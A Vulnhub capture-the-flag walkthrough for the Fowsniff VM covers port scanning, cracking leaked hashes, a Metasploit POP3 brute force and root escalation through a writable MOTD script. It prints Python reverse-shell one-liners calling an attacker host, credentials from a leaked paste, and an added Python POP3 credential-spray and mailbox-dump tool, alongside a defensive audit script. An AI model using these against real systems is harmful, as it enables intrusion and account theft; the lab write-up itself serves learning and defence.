
Fowsniff: 1 Vulnhub Walkthrough

Hello friends! Today we are going to take on another boot2root challenge known as Fowsniff. Credit for making this VM goes to “berzerk0”; it is another boot2root challenge in which our goal is to get root access to complete the challenge. You can download this VM here.

Security Level: Beginner

Flags: There is one flag (flag.txt).

Table of contents:

  • Port scanning and IP discovery
  • Looking at port 80
  • Finding hashes on Pastebin
  • Cracking the hashes
  • Brute forcing the POP3 login
  • Connecting to POP3
  • Finding the SSH username and password
  • Finding privilege escalation vectors
  • Exploiting a misconfiguration in the system
  • Getting root access
  • Reading the flag

Walkthrough

Let’s start off with scanning the network to find our target.

netdiscover

image

We found our target –> 192.168.1.29

Our next step is to scan our target with nmap.

nmap -A -p- -T4 192.168.1.29

image

The nmap output shows four open ports: 22 (SSH), 80 (HTTP), 110 (POP3) and 143 (IMAP).

Port 80 is serving HTTP, so we open the IP in our browser.

image

We don’t find anything on the webpage, and dirb and nikto scans also reveal nothing, so we google “fowsniff corp” and find a Pastebin link containing usernames and password hashes. (You can find the link here)

image

We crack the hashes using this site and obtain the passwords for the respective email addresses, but only 8 of the 9 hashes crack, so one user is left without a password.

image

So we create two wordlists, one of usernames and one of passwords, and use them to brute force the POP3 login.

image

We use the Metasploit framework’s pop3_login module, which tries every combination from the two lists. The only valid pair it finds is “seina:scoobydoo2”.

msf > use auxiliary/scanner/pop3/pop3_login
msf auxiliary(scanner/pop3/pop3_login) > set rhosts 192.168.1.29
msf auxiliary(scanner/pop3/pop3_login) > set user_file user.txt
msf auxiliary(scanner/pop3/pop3_login) > set pass_file pass.txt
msf auxiliary(scanner/pop3/pop3_login) > set verbose false
msf auxiliary(scanner/pop3/pop3_login) > run

 image

We connect to the POP3 service with netcat and log in with the credentials we recovered. After logging in we list the mailbox and find there are 2 messages.

nc 192.168.1.29 110
user seina
pass scoobydoo2
list

image

We retrieve the first message and find that it contains the password for connecting through SSH.

retr 1

image

We retrieve the second message and find a hint to use the username “baksteen”.

retr 2

image
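The POP3 credential spray and mailbox retrieval from the steps above, done with Python’s standard library instead of Metasploit and netcat, as an added example that is not part of the original walkthrough. The fake POP3 server, the user list and the two mail bodies are constructed so the script runs offline; the only value taken from the page is the working pair seina:scoobydoo2. The function names are this example’s own. Point spray_pop3 and dump_mailbox at a real host and port 110 to use them against a target.

```python
import poplib
import socketserver
import threading

# Constructed mailbox for the fake server below (not the real Fowsniff mail).
FAKE_USERS = {"seina": "scoobydoo2"}
FAKE_MAILBOX = [
    "From: it@fowsniff\r\nSubject: reset\r\n\r\nYour temporary SSH password is in this mail.\r\n",
    "From: colleague@fowsniff\r\nSubject: re: reset\r\n\r\nLog in with your own username, baksteen.\r\n",
]


class FakePOP3Handler(socketserver.StreamRequestHandler):
    """Just enough of RFC 1939 (USER/PASS/LIST/RETR/QUIT) to exercise the client."""

    def send(self, line):
        self.wfile.write((line + "\r\n").encode())

    def send_multi(self, lines):
        # A multi-line response ends with a lone "."; data lines starting with "." are byte-stuffed.
        for line in lines:
            self.send("." + line if line.startswith(".") else line)
        self.send(".")

    def handle(self):
        self.send("+OK fake POP3 ready")
        user, authed = None, False
        while True:
            raw = self.rfile.readline()
            if not raw:
                return
            cmd, _, arg = raw.decode(errors="replace").rstrip("\r\n").partition(" ")
            cmd = cmd.upper()
            if cmd == "USER":
                user, authed = arg, False
                self.send("+OK")
            elif cmd == "PASS":
                authed = FAKE_USERS.get(user) == arg
                self.send("+OK logged in" if authed else "-ERR [AUTH] Authentication failed")
            elif cmd == "QUIT":
                self.send("+OK bye")
                return
            elif not authed:
                self.send("-ERR not authenticated")
            elif cmd == "LIST":
                self.send("+OK %d messages" % len(FAKE_MAILBOX))
                self.send_multi("%d %d" % (i + 1, len(m)) for i, m in enumerate(FAKE_MAILBOX))
            elif cmd == "RETR" and arg.isdigit() and 1 <= int(arg) <= len(FAKE_MAILBOX):
                self.send("+OK")
                self.send_multi(FAKE_MAILBOX[int(arg) - 1].rstrip("\r\n").split("\r\n"))
            else:
                self.send("-ERR unsupported")


def start_fake_server():
    """Serve the constructed mailbox on an ephemeral localhost port; return (server, port)."""
    server = socketserver.ThreadingTCPServer(("127.0.0.1", 0), FakePOP3Handler)
    server.daemon_threads = True
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]


def pop3_login(host, port, user, password, timeout=5):
    """Return an authenticated poplib.POP3 session, or None if USER/PASS is rejected."""
    conn = poplib.POP3(host, port, timeout=timeout)
    try:
        conn.user(user)
        conn.pass_(password)
        return conn
    except poplib.error_proto:
        conn.close()
        return None


def spray_pop3(host, port, users, passwords):
    """Try every user/password pair on a fresh connection (as the Metasploit module does with USER_FILE/PASS_FILE)."""
    hits = []
    for user in users:
        for password in passwords:
            conn = pop3_login(host, port, user, password)
            if conn is not None:
                hits.append((user, password))
                conn.quit()
    return hits


def dump_mailbox(host, port, user, password):
    """LIST the mailbox and RETR every message; return the messages as text."""
    conn = pop3_login(host, port, user, password)
    if conn is None:
        raise PermissionError("POP3 login rejected for %s" % user)
    try:
        _, listing, _ = conn.list()  # entries are b"<number> <octets>"
        return [b"\r\n".join(conn.retr(int(e.split()[0]))[1]).decode(errors="replace") for e in listing]
    finally:
        conn.quit()


if __name__ == "__main__":
    server, port = start_fake_server()
    print("valid credentials:", hits := spray_pop3("127.0.0.1", port, ["mauer", "seina"], ["scoobydoo2", "password"]))
    for number, body in enumerate(dump_mailbox("127.0.0.1", port, *hits[0]), 1):
        print("--- message %d ---\n%s" % (number, body))
    server.shutdown()
```

Each attempt uses its own TCP connection because many POP3 servers drop the session after a failed PASS; the multi-line reader in poplib handles the terminating “.” and byte-stuffing for you, which is what the manual netcat session in the walkthrough relies on you doing by eye.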

We use the credentials “baksteen:S1ck3nBluff+secureshell” to login through SSH.

ssh baksteen@192.168.1.29

image

After gaining access we enumerate the system. User “baksteen” belongs to two groups, so we search for files owned by the “users” group and find a file called “cube.sh”.

find / -group users -type f 2>/dev/null

image

We look at the file and find it contains the banner that is printed when we log in through SSH.

cd /opt/cube
cat cube.sh

image

We open the file with vim and append a Python reverse-shell one-liner to it. The address and port in the one-liner must be those of the box where we will run the netcat listener (our attacking machine); 192.168.1.29 is the target itself, so the attacker’s address is written here as <attacker-ip>.

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

We try to run it and get the error “python: command not found”. We look for the interpreter and find that only python3 is installed.

image

So we change the reverse-shell one-liner, replacing python with python3 (again with <attacker-ip> standing for the address of our listener).

python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<attacker-ip>",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

image

The banner we see when logging in through SSH is the one cube.sh prints, so we check the /etc/update-motd.d/ directory for a script that runs it, and find that 00-header executes cube.sh. pam_motd runs the scripts in that directory as root every time a user logs in, so whatever we put in cube.sh (which the users group can write) will run as root at the next login.

image

So now we exit SSH, set up a netcat listener on our machine, and connect through SSH again so that the MOTD hook executes our reverse shell.

ssh baksteen@192.168.1.29

image

As soon as we log in, we get a reverse shell as root on our netcat listener. We change to /root, find the file called “flag.txt”, and read the congratulatory message.

nc -lvp 1234
id
cd /root
cat flag.txt

image
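A check for the misconfiguration this escalation relied on (a root-executed update-motd hook that runs a file an unprivileged group can write), written as an added example rather than taken from the walkthrough. It builds a constructed copy of the 00-header/cube.sh layout in a temporary directory so it runs without touching /etc; point audit_motd_hooks at the real /etc/update-motd.d to audit a host. The function names, the absolute-path regex and the assumption that hooks name their dependencies by absolute path are this example’s own.

```python
import os
import re
import stat
import tempfile
from pathlib import Path

# Hooks name what they execute by absolute path ("sh /opt/cube/cube.sh" in 00-header);
# this example assumes that convention holds for the hooks it audits.
ABS_PATH = re.compile(r"/[A-Za-z0-9_.+~/-]+")


def writable_by_non_owner(path):
    """True if the group or 'other' write bit is set, i.e. someone besides the owner
    (root, for MOTD hooks) can change what pam_motd runs as root at login."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))


def audit_motd_hooks(motd_dir="/etc/update-motd.d"):
    """Return (offending_file, hook) pairs: hooks that are themselves group/world writable,
    and every existing file a hook references that is group/world writable."""
    findings = []
    for hook in sorted(p for p in Path(motd_dir).iterdir() if p.is_file()):
        if writable_by_non_owner(hook):
            findings.append((str(hook), str(hook)))
        for dep in sorted(set(ABS_PATH.findall(hook.read_text(errors="replace")))):
            if os.path.isfile(dep) and writable_by_non_owner(dep):
                findings.append((dep, str(hook)))
    return findings


def harden(path):
    """Drop group/world write on a dependency. When run as root you would also
    chown it root:root; the owner change is left out so the example runs unprivileged."""
    os.chmod(path, os.stat(path).st_mode & ~(stat.S_IWGRP | stat.S_IWOTH))


def build_fixture(root):
    """Constructed copy of the Fowsniff layout under root: a 00-header hook that runs a
    group-writable cube.sh. Returns (motd_dir, hook, cube) as strings."""
    motd_dir = Path(root) / "etc" / "update-motd.d"
    cube = Path(root) / "opt" / "cube" / "cube.sh"
    motd_dir.mkdir(parents=True)
    cube.parent.mkdir(parents=True)
    cube.write_text('#!/bin/sh\necho "Welcome to Fowsniff Corp"\n')
    cube.chmod(0o664)  # writable by the owning group: the bug from the walkthrough
    hook = motd_dir / "00-header"
    hook.write_text("#!/bin/sh\nsh %s\n" % cube)
    hook.chmod(0o755)  # the hook itself is fine
    return str(motd_dir), str(hook), str(cube)


def demo():
    """Audit the constructed fixture before and after hardening cube.sh.
    Returns (findings_before, findings_after, hook, cube)."""
    with tempfile.TemporaryDirectory() as tmp:
        motd_dir, hook, cube = build_fixture(tmp)
        before = audit_motd_hooks(motd_dir)
        harden(cube)
        after = audit_motd_hooks(motd_dir)
    return before, after, hook, cube


if __name__ == "__main__":
    before, after, hook, cube = demo()
    for offender, via in before:
        print("%s is writable by non-owners and is run as root by %s" % (offender, via))
    print("after harden:", after)
```

The check is mode-bit based rather than using os.access, so it gives the same answer whether you run it as root or as an ordinary user; on the walkthrough’s box it would flag /opt/cube/cube.sh via /etc/update-motd.d/00-header, and the fix is the one harden applies plus root ownership.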

Author: Sayantan Bera is a technical writer at hacking articles and cyber security enthusiast. Contact Here

The post Fowsniff: 1 Vulnhub Walkthrough appeared first on Hacking Articles.
